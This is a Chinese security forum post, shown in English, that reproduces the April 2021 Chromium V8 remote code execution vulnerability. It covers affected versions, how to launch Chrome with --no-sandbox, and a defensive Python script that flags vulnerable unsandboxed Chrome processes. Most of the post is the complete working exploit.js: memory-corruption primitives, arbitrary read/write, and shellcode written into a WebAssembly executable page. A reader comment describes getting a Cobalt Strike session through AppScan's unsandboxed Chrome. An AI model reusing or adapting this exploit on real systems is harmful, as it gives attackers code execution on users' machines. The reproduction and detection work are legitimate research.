[Limited-time event] 2021.04.13 Google Chrome Remote Code Execution 0Day Vulnerability Reproduction

gjmvp   ·   Posted on 2021-04-21 12:02:03   ·   Technical Article Submissions

0x00 Preface

I heard about this vulnerability a few days ago but never had the chance to reproduce it. Today I decided to do so; after reading a few articles, I got started on the reproduction myself.

0x01 Vulnerability Overview

  • On April 13, 2021, 360CERT detected that a foreign security researcher had published POC details for a Chrome remote code execution 0Day.
    Severity: Critical
    CVSS score: 9.8
  • Chrome's engine is one of the four major browser engines, generally referred to as the Chromium engine or Chrome engine. Chrome is open source, and browsers currently built on the Chrome engine include Google Chrome, 360 Speed Browser, Sogou, the new Opera, Yandex, and Microsoft's own Microsoft Edge. In short, the Chrome engine holds a very large share of the browser market.
  • The vulnerability affects the then-current versions of Google Chrome, Microsoft Edge, and other browsers that may be based on Chromium. However, the browser sandbox has to be disabled; in other words, Chrome's sandbox blocks this remote code execution vulnerability. It has also already been fixed in the latest Google Chrome release, 90.0.4430.72.

0x02 Vulnerability Conditions

The environment required for the vulnerability is as follows:

  • Browser version <= 89.0.4389.114
  • The vulnerability cannot escape the sandbox, so the browser's sandbox feature must be disabled (it is enabled by default)

How to disable the sandbox:
  1. Right-click the Google Chrome shortcut, choose Properties, open the Shortcut tab, and append the following after the Target field:
--no-sandbox

  2. Click Apply, then OK.
  3. Open the browser; if you see the warning bar, the sandbox has been disabled successfully.
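The two conditions above, an affected build plus a disabled sandbox, are exactly what a defender should be hunting for on endpoints. The following Python script is an added example, not code from the original post or from the exploit author. It evaluates process records (image name, command line, product version) against the version bound stated above and flags the standalone --no-sandbox switch. The ProcessRecord structure and the sample records are constructed for the example; on a real Windows host you would feed it the Name and CommandLine of running processes (for instance from Get-CimInstance Win32_Process) together with each executable's file version, or the Target field of shortcuts, which is where the write-up adds the flag.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Bounds as stated in the write-up (Chrome's numbering): affected up to and
# including 89.0.4389.114, fixed in 90.0.4430.72.
LAST_AFFECTED_VERSION = "89.0.4389.114"
FIXED_VERSION = "90.0.4430.72"

# Matches --no-sandbox only as a whole token, so --no-sandbox-foo is not matched.
NO_SANDBOX_RE = re.compile(r"(?<!\S)--no-sandbox(?!\S)")

# Chromium-based image names we care about (assumption for this example).
CHROMIUM_EXES = {"chrome.exe", "msedge.exe", "chromium.exe"}


@dataclass
class ProcessRecord:
    name: str          # image name, e.g. chrome.exe
    command_line: str  # full command line or shortcut target
    version: str       # product version of the executable


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn a dotted version string into a tuple for numeric comparison."""
    return tuple(int(p) for p in v.strip().split("."))


def is_affected_version(v: str) -> bool:
    """True when the version is within the affected range from the write-up."""
    return parse_version(v) <= parse_version(LAST_AFFECTED_VERSION)


def sandbox_disabled(command_line: str) -> bool:
    """True when the renderer sandbox is switched off via --no-sandbox."""
    return NO_SANDBOX_RE.search(command_line) is not None


def assess(rec: ProcessRecord) -> Optional[str]:
    """Return a finding for a risky Chromium process, or None if it is fine."""
    if rec.name.lower() not in CHROMIUM_EXES:
        return None
    unsandboxed = sandbox_disabled(rec.command_line)
    old = is_affected_version(rec.version)
    if unsandboxed and old:
        return f"{rec.name} {rec.version}: sandbox disabled AND affected version (RCE reachable)"
    if unsandboxed:
        return (f"{rec.name} {rec.version}: sandbox disabled (--no-sandbox); "
                "any renderer bug becomes host compromise")
    if old:
        return f"{rec.name} {rec.version}: affected version, sandbox on (update to {FIXED_VERSION} or later)"
    return None


def audit(records: List[ProcessRecord]) -> List[str]:
    """Run assess() over every record and keep the findings, in input order."""
    return [f for f in (assess(r) for r in records) if f is not None]


CHROME = r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'

# Constructed sample records; they are not taken from a real host.
SAMPLE_RECORDS = [
    ProcessRecord("chrome.exe", CHROME + " --no-sandbox", "89.0.4389.114"),
    ProcessRecord("chrome.exe", CHROME + " --disable-gpu", "89.0.4389.90"),
    ProcessRecord("chrome.exe", CHROME + " --no-sandbox", "90.0.4430.72"),
    ProcessRecord("chrome.exe", CHROME, "90.0.4430.72"),
    ProcessRecord("notepad.exe", "notepad.exe --no-sandbox", "10.0.19041.1"),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RECORDS):
        print("[!]", finding)
```

The flag check deliberately matches the whole token: the write-up's shortcut edit produces `chrome.exe" --no-sandbox`, and the negative lookarounds keep unrelated switches with the same prefix from triggering. Because the version bound comes from the post, the version comparison applies to Chrome's numbering; other Chromium derivatives use their own version schemes and would need their own bounds.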

0x03 Vulnerability Verification

Vulnerability POC:
https://github.com/r4j0x00/exploits/tree/master/chrome-0day

This script opens the Windows 10 calculator.

exploit.js

```javascript
/*
BSD 2-Clause License
Copyright (c) 2021, rajvardhan agarwal
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);
let buf2 = new ArrayBuffer(0x150);
function ftoi(val) {
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}
function itof(val) {
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}
const _arr = new Uint32Array([2**31]);
function foo(a) {
    var x = 1;
    x = (_arr[0] ^ 0) + 1;
    x = Math.abs(x);
    x -= 2147483647;
    x = Math.max(x, 0);
    x -= 1;
    if(x==-1) x = 0;
    var arr = new Array(x);
    arr.shift();
    var cor = [1.1, 1.2, 1.3];
    return [arr, cor];
}
for(var i=0;i<0x3000;++i)
    foo(true);
var x = foo(false);
var arr = x[0];
var cor = x[1];
const idx = 6;
arr[idx+10] = 0x4242;
function addrof(k) {
    arr[idx+1] = k;
    return ftoi(cor[0]) & 0xffffffffn;
}
function fakeobj(k) {
    cor[0] = itof(k);
    return arr[idx+1];
}
var float_array_map = ftoi(cor[3]);
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
var fake = fakeobj(addrof(arr2) + 0x20n);
function arbread(addr) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    return (fake[0]);
}
function arbwrite(addr, val) {
    if (addr % 2n == 0) {
        addr += 1n;
    }
    arr2[1] = itof((2n << 32n) + addr - 8n);
    fake[0] = itof(BigInt(val));
}
function copy_shellcode(addr, shellcode) {
    let dataview = new DataView(buf2);
    let buf_addr = addrof(buf2);
    let backing_store_addr = buf_addr + 0x14n;
    arbwrite(backing_store_addr, addr);
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
copy_shellcode(rwx_page_addr, shellcode);
f();
```

exploit.html

```html
<script src="exploit.js"></script>
```

Then double-click the constructed POC test page locally, and you can see that the calculator pops up successfully.


0x04 Summary

Because Google Chrome's sandbox is enabled by default, a browser used normally is not exposed to this issue.

Moreover, during my own reproduction I found that this vulnerability is not that easy to reproduce; it only succeeded after many attempts. My personal feeling is that it would still be fairly difficult to exploit in practice.


Track-聂风
Posted on 2021-4-21

WeChat's built-in browser uses the Google Chrome engine with the sandbox disabled by default. The new version was fixed just in the past few days.


xiaoc
Posted on 2021-4-22

AppScan also uses Chrome with “ --no-sandbox ”, and then,

as long as it scans exp.html it can also come online in CS.

There are many similar cases.


© 2016 - 2022 掌控者 All Rights Reserved.